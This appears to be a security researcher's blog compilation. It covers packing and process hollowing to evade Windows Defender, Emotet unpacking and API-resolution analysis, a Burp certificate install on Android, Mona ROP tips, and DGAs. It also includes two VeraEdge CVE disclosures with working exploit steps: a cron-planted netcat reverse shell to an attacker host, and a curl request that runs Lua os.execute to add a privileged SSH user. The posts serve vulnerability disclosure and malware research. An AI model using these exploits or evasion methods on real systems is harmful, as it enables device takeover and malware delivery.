Packing and Process Injection to Evade Windows Defender

I have spent the last couple of weeks exploring packers and process injection from an attacker’s perspective in Windows environments.  When paired together, both packing and process injection have proven effective in evading antivirus software, specifically Windows Defender.  In this post I will discuss the concepts behind packing and process injection as it relates to antivirus evasion.


A packer is a software program that accepts a binary executable file and transforms it into an encrypted version.  The encrypted file decrypts itself at runtime an executes the original program.  Signature based antivirus software works by detecting known patterns in malicious software files to block their execution.  Signature based antivirus can be evaded by encrypting a malicious file as represented on disk giving it a unique signature not cataloged in the antivirus signature database.

To understand the basics of packing Portable Executable files, a general understanding of the PE format and PE loader is required.

The packer I have developed has two components. The first component is a crypter.  The crypter takes a PE file as input, encrypts the file and encodes it in a way that is suitable for the packer to decrypt.  This is the payload.  The second component is the packer source.  The output from the crypter is embedded in the .rsrc section of the packer PE file once compiled.   The packer source acts as a decrypter and PE loader for the encrypted payload.  


The crypter encrypts the input PE file using AES 256 ECB.  This was an arbitrary decision that will likely be revisited in a rewrite in the coming weeks (more on that later).  The encrypted file is Base64 encoded and saved to a text file for input into the packer build process.

When the packer is executed, the Base64 encoded file is located in the .rsrc section and loaded into memory. Once in memory, the file is Base64 decoded and decrypted using a hard-coded key.  This is the reason I plan on revisiting the encryption scheme.  The plan is to change this implementation detail in a future rewrite such that a key is chosen in a limited key space so that it can be brute forced at startup from the packer.  Brute forcing the key at startup will allow the packer to decrypt the payload without the need for a hard-coded key.  A hard-coded key makes static analysis and potentially antivirus detection more feasible.

Once the file has been decrypted, it is handed off to a PE loader to begin execution.


The packer is written in C++ and makes use of both documented and undocumented Windows APIs to load the PE in memory at runtime and execute the embedded payload.

The PE loader makes use of important structures to load the PE into memory, fix up the import address table, and rebase the image if needed.  


The PIMAGE_DOS_HEADER is used to validate the PE in addition to acting as a reference to the base of the image.


The PIMAGE_NT_HEADERS structure contains a four-byte signature identifying the file as a PE image. Again, this is used to validate the PE in addition to walking the structure to the IMAGE_OPTIONAL_HEADER and other addresses of importance.


The IMAGE_OPTIONAL_HEADER points to the image base and entry point address.  Additionally, we have access to the size of the image allowing us to allocate memory via VirtualAllocEx for the payload.


The PIMAGE_SECTION_HEADER provides access to the address and sizes of the different PE sections.  Each section is copied into a new address space for execution.

Once memory is allocated for the image, the packer will copy over the image headers and each of the corresponding image sections.  After that, the image is rebased if it is not written to the expected region of memory.  The includes looping over the BASE_RELOCATION_TABLE and adjusting each relocation block as the relocation block patching instructions are relative to the image base which has changed. 

If we were to execute the code now it would fail.  We would need to adjust the import address table by loading the required libraries using LoadLibraryA and using GetProcAddress to set the expected function addresses for the in-memory import address table.  I’m not going to go into this in detail.  My experience with this approach is that the payload is quickly discovered by the behavior analysis of Windows Defender.  To get around this issue I opted to use a process injection technique to further disguise malicious activity.

Process Injection

Instead of executing a malicious payload in the context of the packer, we can instead inject code into a host program.  In essence, process injection is the act of running foreign code within the address space of another process.  This improves stealth and, in my experience, helps avoid some behavior analysis executed by antivirus on running code.

Process Hollowing

Process hollowing is one of many different types of process injection techniques.  With process hollowing, code is injected into a target program by unmapping the legitimate code from memory and overwriting the memory space with malicious code.

To execute process hollowing, a target process is created in a suspended state.  NtUnmapViewOfSection is used to unmap a region of memory from the virtual address space of the running process.  From there, memory is allocated at that region using VirtualAllocEx.  The payload’s image headers and sections are copied into that region of memory.  Just as previously mentioned, the image is rebased if it is not written to the expected region of memory.  The includes looping over the BASE_RELOCATION_TABLE and adjusting each relocation block as the relocation block patching instructions are relative to the image base which has changed.

After the packer has finished writing the payload to memory of the target process and rebasing the image, it calls SetThreadContext to point to the new address of entry point.  Finally, ResumeThread is called to continue execution of the target process transferring control to the malicious code.


When paired together, both packing and process injection have proven effective in evading antivirus software.  In my testing, commonly detected PE files were executed using the above techniques without being picked up by antivirus.  I plan to release some code using some of the techniques discussed in this post over the coming weeks.  This post will be updated when the time comes.

Emotet File Drop While Debugging

In doing some dynamic analysis on the latest Emotet samples, I was running into an issue getting the persistent copy of the malware to execute. In its normal flow of execution, Emotet will drop itself into C:\Users\<username>\AppData\Local and make a call to CreateProcessW to continue execution. I was unable to break on CreateProcessW. Instead, the code would terminate.

It turns out Emotet was making a call to SHFileOperationW to do the file drop. SHFileOperationW takes a structure named _SHFILEOPSTRUCTA.

typedef struct _SHFILEOPSTRUCTA {
  HWND         hwnd;
  UINT         wFunc;
  PCZZSTR      pFrom;
  PCZZSTR      pTo;
  BOOL         fAnyOperationsAborted;
  LPVOID       hNameMappings;
  PCSTR        lpszProgressTitle;

Here is the structure in memory.

As you can see the wFunc param is set to 01 or FO_MOVE. The result was C0000043 (STATUS_SHARING_VIOLATION). This was causing an issue because my debugger had a handle on the file preventing the move from occurring. I needed to change the value to FO_COPY or 02 to copy the file instead. With this the code continued execution as expected.

How Emotet Resolves APIs

If you take a look at an unpacked Emotet sample, something will certainly stick out to you. The sample will have few to no imports. Yet the malware is clearly making heavy use of the Windows API to achieve its objectives. So how is it doing this? It is making use of a well-known shell coding technique to dynamically load APIs at runtime without the use of strings.

Emotet is locating the DLL name from the Process Environment Block. The malware will search for the desired module name and then locate the image base. From the image base of the located module, it is then able to walk the export table locating function pointers for its own import table. In Windows, the FS register points to the Thread Environment Block, or TEB. The offset 0x30 contains a pointer to the Process Environment Block, or PEB. From there the malware will walk the structure to _PEB_LDR_DATA which contains the head of a doubly-linked list called InMemoryOrderModuleList. This list contains the list entries containing BaseDllName and DllBase. When the entry point to the PE header is located, the PE structure is walked to find the export table. Emotet will then loop over the exported names to find the API function it is searching for.

Let’s take a look at this in action. The sample I am looking at is 0b96754a84bc2c01e4e8d64a534c03b5636fb6e958f7c381f9c27e646466cd32.

Sub_403640 starts off by grabbing a reference to the TEB and then grabbing a pointer to the PEB at offset 0x30. From there, a pointer to the _PEB_LDR_DATA structure is saved off along with the module hash that was stored in ecx prior to the function call.

The code then loops over the BaseDllNames comparing them to the module hash. If the hashed BaseDllName matches the hash that was passed in, the DllBase is moved into eax prior to returning from the function.
The next function to look at is sub_4037C0 which locates the specific API in the selected module. Two parameters are moved into registers for this function call. edx contains the hash and ecx will contain the module address that was just resolved. The beginning of the function starts by getting the offset of the PE header. Next, the RVA of the IMAGE_DIRECTORY_ENTRY_EXPORT is located. From there, the table of exported functions is located which is an RVA from the base of image. The function then begins a loop over the exported functions calculating a hash of each function name as it progresses. The function pointer is located by getting the RVA of the ordinals and then finding the specific ordinal of the function. The RVA of function pointers is then located before locating the specific RVA of the function. The RVA is converted to a virtual address before being stored.

The two function calls Sub_403640 (GetModuleAddress) and sub_4037C0 (GetAPIAddress) will be paired together throughout the code. Once Emotet has resolved the API in a given module, parameters are pushed onto the stack before the call eax.

Unpacking Emotet

In this post I take a look at unpacking Emotet to discover hard coded command and control servers.  The MD5 for the sample I’m looking at is 8db38c7f70214ee08e166cde8b9163c6.

This sample of Emotet uses a customized packer.  Instead of trying to reverse the algorithm to unpack the next stage, we can use dynamic analysis.  I’ll let the malware do the unpacking for me and grab the next stage out of memory.  The process will need to allocate memory for the next stage, so it’s a good assumption that we will see a call to VirtualAlloc.  Open up the sample in x32dbg and set a breakpoint on VirtualAlloc.  When the breakpoint is hit, we can note the parameters that were passed to the function.

LPVOID VirtualAlloc(
  LPVOID lpAddress, 0x0
  SIZE_T dwSize,  // 0xc000
  DWORD  flAllocationType, // 0x3000 i.e. MEM_COMMIT | MEM_RESERVE
  DWORD  flProtect // 0x4 i.e. PAGE_READWRITE

As you can see, the sample is letting the system determine where to allocate the memory with read write permissions.  After the call to VirtualAlloc, the eax register will contain the base address of the allocated region.  I dumped the memory at that address to keep an eye on it.  After letting the code run to the next breakpoint, I can see the memory has been populated.  Next, I jump to the memory map and dump the memory to a file.  

Opening the dump in a hex editor displays the following.

The file clearly contains a PE file but there is some extra code at the beginning of the file.  I’m unclear as to what this extra code is at this time, I may come back to look at it later. To move things along, I just looked for the magic number and trimmed the rest of the contents to the beginning of the file.  

Opening the file in IDA just to take a peek I noticed that there were zero imports.  Jumping to sub_403530 I noticed some signs of dynamically creating an import table.  Looking at some of the instructions I can see that it is grabbing a pointer to the process environment block.  From there it appears to be walking the structure to locate function pointers for its own import table. There is certainly more to research here, but I’ll save that for another post.

After unpacking, we can see the list of C2 servers is hard coded in the binary.  This information gets written to a buffer in the .data section of the code.  If we are looking to grab the IOCs from the sample, we want to let the malware run and write the C2 servers to the buffer and examine the memory.  In the following screenshot we can see the first IP address and port.

The list will contain a series of IP addresses.  The highlighted IP address and port will corollate to  The first four bytes is the IP address followed by two bytes for the port.  The next two bytes can be ignored.  I extracted the following C2 servers from the sample.

Vera Edge Home Controller – Remote Shell via Unauthenticated Command Injection

Note: This vulnerability has been assigned CVE-2019-15498.

This post outlines a vulnerability for the VeraEdge Home Controller running firmware version 1.7.4452. The VeraEdge allows you to connect with and control a variety of different smart home devices from different vendors. Device settings and states can be orchestrated using scenes and rooms to control a smart home. The devices can be accessed by the home controller using Z-Wave or Wi-Fi. The device can be access remotely via mobile and web applications. The VeraEdge controller also has a local web server for access on the LAN.

The hardware consists of a 600MHz MIPS SoC, 128MB NAND flash, and 128MB of DDR2 memory. The controller has support for Wi-Fi, Z-Wave, and USB in addition to ethernet.

A command injection vulnerability was discovered in the /cgi-bin/cmh/ endpoint. The Vera Edge Home Controller hosts many Haserl scripts in the /www/cgi-bin/cmh directory. The file is vulnerable to limited command injection. Furthermore, the endpoint does not have any CSRF protection, authentication, or authorization requirements. Given the lack of endpoint protection it is possible to exploit this vulnerability over the Internet through the use of a phishing email or drive by visit to a web site.

Content-Type: image/jpeg

#Copyright (C) 2009 MiOS, Ltd., a Hong Kong Corporation
#           1 - 702 - 4879770 / 866 - 966 - casa
#This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License.
#This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

if [[ -n "$FORM_ip" ]]; then
    if [[ -n "$FORM_username" ]]; then
        if [[ -n "$FORM_password" ]]; then
            curl -k -s -u $FORM_username:$FORM_password --connect-timeout 3 --max-time 5 "http://$FORM_ip/SnapshotJPEG?Resolution=160x120&Quality=Standard"
           curl -k -s -u $FORM_username --connect-timeout 3 --max-time 5 "http://$FORM_ip/SnapshotJPEG?Resolution=160x120&Quality=Standard"
        curl -k -s "http://$FORM_ip/SnapshotJPEG?Resolution=160x120&Quality=Standard"

From the above script, we can see that the script takes the following input parameters: ip, username, and password. Depending on what values are present, a cURL command is constructed using the appropriate command line arguments. Haserl is supposed to protect against command injection. The following characters appeared to be ignored or stripped from processing by Haserl even though the variable isn’t enclosed in quotes: “; ? & |”. With this limitation, it was found that additional command line arguments can still be injected into the command and supplied to cURL. The protections just limit an attacker from terminating the cURL command early or concatenating input to execute arbitrary shell commands.

Since the attacker controls the IP address in which cURL will retrieve a file, a remote server can be setup in the following manner to host a malicious file. The exploit requires the use of a cron job to execute a netcat callback command for retrieving a remote shell. Setup a cron file hosted on the remote server for the cURL command to retrieve. Execute the following commands on a remotely accessible Linux server.

mkdir www
cd www
touch index.html
echo * * * * * nc -e /bin/ash {ip address of remote server} 8000 > index.html
python3 -m http.server 80

The following screenshot shows the remote server setup and listening for requests.


Next, the attacker can craft a malicious URL to be sent to the victim.{ip address of remote server}/index.html%20–output%20/etc/crontabs/nobody

The previous URL will cause the cURL command to execute a GET request to the IP address of a remote server retrieving the index.html file and outputting it to the location /etc/crontabs/nobody. The –output /etc/contabs/nobody is injected into the cURL command of the script which is executed. The filename in which the cron file is output to requires a valid user. The nobody user was selected in this case. The cron job will execute every minute executing nc -e /bin/ash {remote server ip} 8000. This command will execute /bin/ash directing stdin, stdout, and stderr to the network descriptor. With a listener on the other end the attacker will have a remote shell over port 8000.

The attacker will setup a listener using the nc -l -p 8000 -vvv command to listen on port 8000 for incoming connections.



Tech Note: Installing Burp Certificate on Android 9

Note: this technique does not work on Android 10. At this point, I am unsure of how to make /system writable to copy the certificate into the trusted store.

After setting up a proxy and configuring a device, normally you can navigate to http://burp and download the certificate for installation. This did not work for me when running Android 9.

To install the certificate on an Android 7 or above device I had to export the certificate from Burp in DER format.

Screen Shot 2017-12-12 at 10.35.39 AM

Once the certificate is exported it must be converted from DER to PEM format.

openssl x509 -inform DER -in burp.der -out burp.pem

Rename the certificate using the subject hash.

openssl x509 -inform PEM -subject_hash_old -in burp.pem |head -1

mv burp.pem <output_from_prevous_command>.0

Copy the file <subject_hash>.0 into /sdcard on the android device.

./adb push /path/to/file/<subject_hash>.0 /sdcard/

Remount /system as read/write. This requires a rooted Android device or emulator.

./adb shell su -c “mount -o rw,remount,rw /”

Open a shell on the Android device.

./adb shell

Once the shell is loaded, move the file into the trusted certificate store, set correct permissions, and reboot the device.

cp <subject_hash>.0 /system/etc/security/cacerts

chmod 644 /system/etc/security/cacerts/<subject_hash>.0


Vera Edge Home Controller – LuaUPnP Unauthenticated Command Injection

Note: This vulnerability has been assigned CVE-2019-13598.

A command injection vulnerability was discovered in the /port_3480/data_request endpoint.  The VeraEdge has support for Lua scripting allowing developers to extend the functionality of the device.  Lua scripts submitted in the Test Luup code (Lua) form in the web interface are handled by the /port_3480/data_request endpoint which forwards requests to a C++ program called LuaUPnP.  LuaUPnP does not whitelist input allowing for the use of insecure API calls.  Furthermore, the endpoint does not have any authentication or authorization requirements.

The following image is an extract of the /etc/lighthttpd.conf displaying the proxy rule which forwards requests to the /port_3480 endpoint to localhost:3480.


The following image displays output from the netstat command displaying the LuaUPnP process listening on all interfaces


The following image displays output from the ps aux command showing that LuaUPnP runs as root.


Exploiting LuaUPnP via command injection will likely grant the same root level privileges.

Requests are handled but he JobHandler_LuaUPnP::HandleActionRequest function.  This function determines the type of request being made, if the action parameter is equal to RunLua it will call the JobHandler_LuaUPnP::RunLua function. JobHandler_LuaUPnP::RunLua does some setup and sanity checking before delegating the execution of Lua script to the JobHandler_LuaUPnP::RunCode function.  One such sanity check that is performed, is to see if unsafe Lua scripting is allowed.  This block of code appears to never be executed in my testing of different device security settings.

if (*(char *)(*(int *)(this + 0x244) + 0x20f) == '\0') {
    piVar2 = (int *)GetInstance();
    (**(code **)(*piVar2 + 0x10))(piVar2,2,"JobHandler_LuaUPnP::RunLua unsafe disabled");
    __dest = (char *)(*(int *)param_1 + 8);
    __nptr = "No unsafe lua allowed";
  else {
 	// Additional checks before running Lua code…



The following cURL command demonstrates exploitation of this vulnerability by creating a new user giving the attacker access to login to the device via SSH which is enabled by default.

curl -i -s -k  -X $'POST' \
    -H $'Host:' -H $'Content-Length: 252' \
    --data-binary $'id=lu_action&serviceId=urn:micasaverde-com:serviceId:HomeAutomationGateway1&action=RunLua&Code=os.execute(%22adduser%20-h%20%2Froot%20-s%20%2Fbin%2Fash%20testuser%22)%3B%0Aos.execute(%22echo%20-e%20%5C%22test%5Cntest%5C%22%20%7C%20passwd%20testuser%22)' \

Using Mona with WinDbg

Load pykd.pyd

.load pykd.pyd

Verify Mona is working by viewing usage information

!py mona

Search for modulars that are not ASLR or rebased

!py mona noaslr

Search through memory to find ROP gadgets in the kernel32.dll module

!py mona rop -m kernel32.dll

We can search multiple modules at once to find ROP gadgets for better results

!py mona rop -m "kernel32.dll,server.exe,ws2_32.dll,RPCRT4.dll" -cpb "\x00\x0a\x0d"

Search for gadgets using wildcards. The following example will search kernel32.dll for pop any 32 bit register, pop any 32 bit register, and then a return

!py mona findwild -m kernel32.dll -s "pop r32 # pop r32 # ret"

WinDbg tips for writing shellcode

I’ve had to search for instruction using WinDbg when doing a stack pivot.  The following example will search for jump edx (ff e2):

s 0 L?7EEEEEEE ff e2

Once you find a list of instructions that can be used for your pivot, verify you have the correct command by disassembling at that address:

0:000> u 7706da75
7706da75 ffe2 jmp edx
7706da77 48 dec eax
7706da78 8b05ca160300 mov eax,dword ptr ds:[316CAh]
7706da7e 48 dec eax
7706da7f 85c0 test eax,eax
7706da81 7419 je 7706da9c
7706da83 807c246000 cmp byte ptr [esp+60h],0
7706da88 7412 je 7706da9c

Once you have found an address to use for your stack pivot double check the memory protections at that address using !vprot:

0:000> !vprot 7706da75
BaseAddress: 7706d000
AllocationBase: 77050000
AllocationProtect: 00000080 PAGE_EXECUTE_WRITECOPY
RegionSize: 00018000
State: 00001000 MEM_COMMIT
Protect: 00000020 PAGE_EXECUTE_READ
Type: 01000000 MEM_IMAGE

Explaining DGAs

A DGA is a Domain Generating Algorithm.  These algorithms provide malware with new domains when connecting back to a C2 server.  Both the C2 server and the client need to implement the same DGA to keep in sync for constant communication at any given time.

DGAs are a necessary to avoid blacklisting which hinders the operation of the malware.  Without a DGA a new version of malware would need to be deployed when the domain is discovered and blocked.  A well written DGA is hard to determine and switches on a regular interval to avoid blacklisting keeping the C2 communication up and running.  The result of a DGA is an AGD or algorithmically generated domain.  The constant changing of domains is often referred to as Domain Fluxing.

Finding DGAs in malware is often the combination of reverse engineering and dynamic analysis.  Reverse engineering will allow you to determine seed values and top level domains used to generate the domains.  The goal is to reverse engineer the algorithm to predetermine domains for blacklisting.  Alternately, you can run the malware and log network traffic reviewing the generated domains, and attempt to reverse engineer the algorithm which generated them.

In summary, DGAs provide malware authors a method to avoid detection and blacklisting of there C2 channel.  Reverse engineering the DGA provides a method for defenders protect their networks from malicious activity.  DGA authors will continue to think of new and clever ways of generating domains for C2 connectivity.  Potential methods include seeding the algorithms based on trending topics on Twitter, stock market prices, or even the current value of bitcoin.  The potential methods are only limited by one’s imagination.